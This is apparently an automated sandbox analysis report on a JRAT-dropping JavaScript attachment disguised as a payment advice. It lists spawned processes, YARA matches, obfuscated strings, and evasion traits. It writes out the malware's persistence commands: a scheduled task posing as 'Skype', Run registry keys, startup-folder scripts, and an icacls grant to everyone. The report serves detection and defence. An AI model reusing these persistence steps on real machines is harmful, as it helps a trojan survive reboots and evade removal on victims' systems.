Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3676:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4268:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3540:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3164:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1964:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:476:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1324:120:WilError_01
Java / VBScript file with very long strings (likely obfuscated code)
Source: 35Payment Advise - 201903140987758292 copy_2.js | Initial sample: Strings found which are bigger than 50
Reads the hosts file
Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64log.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\icacls.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wow64log.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Section loaded: wow64log.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Section loaded: wow64log.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Section loaded: wow64log.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Section loaded: wow64log.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Section loaded: wow64log.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Section loaded: wow64log.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Section loaded: wow64log.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Section loaded: wow64log.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wow64log.dll
Yara signature match
Source: 00000004.00000003.7656863427.0000000002B10000.00000004.sdmp, type: MEMORY | Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
Source: C:\Users\CRAIGH~1\AppData\Local\Temp\_0.77942883373632286473112401160232438.class, type: DROPPED | Matched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
Source: C:\Users\user\OdoQgwznLPI\fyTWDUKVDRn.jNMMAX, type: DROPPED | Matched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
Source: C:\Users\user\AppData\Roaming\ufvkaboule.txt, type: DROPPED | Matched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
Classification label
Source: classification engine | Classification label: mal100.spre.troj.expl.evad.winJS@62/29@28/1
Creates files inside the user directory
Source: C:\Windows\SysWOW64\wscript.exe | File created: C:\Users\user\AppData\Roaming\jQhqDpyueS.js
Creates temporary files
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File created: C:\Users\CRAIGH~1\AppData\Local\Temp\hsperfdata_user
Executable is probably coded in java
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Section loaded: C:\Program Files (x86)\Java\jre1.8.0_171\bin\client\jvm.dll
Executes visual basic scripts
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive1973602545167020741.vbs
Reads ini files
Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Reads software policies
Source: C:\Windows\SysWOW64\wscript.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\35Payment Advise - 201903140987758292 copy_2.js'
Source: unknown | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\jQhqDpyueS.js'
Source: unknown | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js'
Source: unknown | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\rnmbjgzzvs.txt'
Source: unknown | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknown | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw' -jar 'C:\Users\user\AppData\RoamingServer1333639532.jar'
Source: unknown | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\rnmbjgzzvs.txt'
Source: unknown | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw' -jar 'C:\Users\user\AppData\RoamingServer757169862.jar'
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js'
Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknown | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\RoamingServer757169862.jar'
Source: unknown | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\rnmbjgzzvs.txt'
Source: unknown | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw' -jar 'C:\Users\user\AppData\RoamingServer1540907542.jar'
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js'
Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknown | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\RoamingServer1540907542.jar'
Source: unknown | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\ufvkaboule.txt'
Source: unknown | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe' -jar C:\Users\CRAIGH~1\AppData\Local\Temp\_0.77942883373632286473112401160232438.class
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IyFfaseYOW.js'
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive1973602545167020741.vbs
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive6603369485550255976.vbs
Source: unknown | Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive1973602545167020741.vbs
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknown | Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive6603369485550255976.vbs
Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive7989435855425943881.vbs
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\jQhqDpyueS.js'
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\ufvkaboule.txt'
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js'
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\rnmbjgzzvs.txt'
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw' -jar 'C:\Users\user\AppData\RoamingServer1333639532.jar'
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw' -jar 'C:\Users\user\AppData\RoamingServer757169862.jar'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw' -jar 'C:\Users\user\AppData\RoamingServer1540907542.jar'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe' -jar C:\Users\CRAIGH~1\AppData\Local\Temp\_0.77942883373632286473112401160232438.class
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive1973602545167020741.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive7989435855425943881.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive6603369485550255976.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe | Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive1973602545167020741.vbs
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive6603369485550255976.vbs
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Uses an in-process (OLE) Automation server
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Submission file is bigger than most known malware samples
Source: 35Payment Advise - 201903140987758292 copy_2.js | Static file information: File size 1765207 > 1048576
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll

Data Obfuscation:

JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Source: 35Payment Advise - 201903140987758292 copy_2.js | String: entropy: 5.55, length: 1761732, content: "d!-!FyIGxvb!-!dUZXh0MSA9ICJkbUZ5SUVOaGJHeGxjbEpsWVdOMFNsTWdQU0J1WlhjZ1JuVnVZM1JwYjI0b0tUc05DZzBLW!-
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0563C0E3 push es; iretd 5_2_0563C0E4
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0563BF2D push ecx; ret 5_2_0563BF2E
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0650E294 push es; ret 5_2_0650E298
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0650F8CA push es; retf 5_2_0650F8D8

Boot Survival:

Creates autostart registry keys to launch java
Source: C:\Windows\SysWOW64\wscript.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ntfsmgr "C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\rnmbjgzzvs.txt"
Creates multiple autostart registry keys
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Server
Source: C:\Windows\SysWOW64\wscript.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 0IDR124VF6
Source: C:\Windows\SysWOW64\wscript.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ntfsmgr
Drops script or batch files to the startup folder
Source: C:\Windows\SysWOW64\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IyFfaseYOW.js
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IyFfaseYOW.js
Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\SysWOW64\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IyFfaseYOW.js
Stores files to the Windows start menu directory
Source: C:\Windows\SysWOW64\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IyFfaseYOW.js
Creates an autostart registry key
Source: C:\Windows\SysWOW64\wscript.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ntfsmgr
Source: C:\Windows\SysWOW64\wscript.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ntfsmgr
Source: C:\Windows\SysWOW64\wscript.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ntfsmgr
Source: C:\Windows\SysWOW64\wscript.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ntfsmgr
Source: C:\Windows\SysWOW64\wscript.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 0IDR124VF6
Source: C:\Windows\SysWOW64\wscript.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 0IDR124VF6
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Server
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Server
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Server
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Server
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Server
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Server

Hooking and other Techniques for Hiding and Protection:

Uses cacls to modify the permissions of files
Source: unknown | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Disables application error messages (SetErrorMode)
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Enumerates the file system
Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: wscript.exe, 00000000.00000002.8268162216.0000000006930000.00000002.sdmp, wscript.exe, 00000004.00000002.7674173949.0000000005820000.00000002.sdmp, wscript.exe, 00000005.00000002.8748496547.0000000005B00000.00000002.sdmp, javaw.exe, 00000006.00000002.7697698930.0000000015990000.00000002.sdmp, javaw.exe, 0000000B.00000002.8769638913.0000000015A30000.00000002.sdmp, javaw.exe, 0000000F.00000002.7797593750.0000000001070000.00000002.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: javaw.exe, 00000006.00000002.7678289065.0000000002EF0000.00000004.sdmp, javaw.exe, 0000000B.00000002.8757288355.0000000003020000.00000004.sdmp, javaw.exe, 0000000F.00000002.7813408295.0000000014C00000.00000002.sdmp | Binary or memory string: ,java/lang/VirtualMachineError
Source: wscript.exe, 00000005.00000002.8750970481.0000000006310000.00000004.sdmp, wscript.exe, 00000017.00000002.8908412172.000001E97BA29000.00000004.sdmp | Binary or memory string: Hyper-V RAW
Source: javaw.exe, 0000000F.00000002.7793994403.00000000001C8000.00000004.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
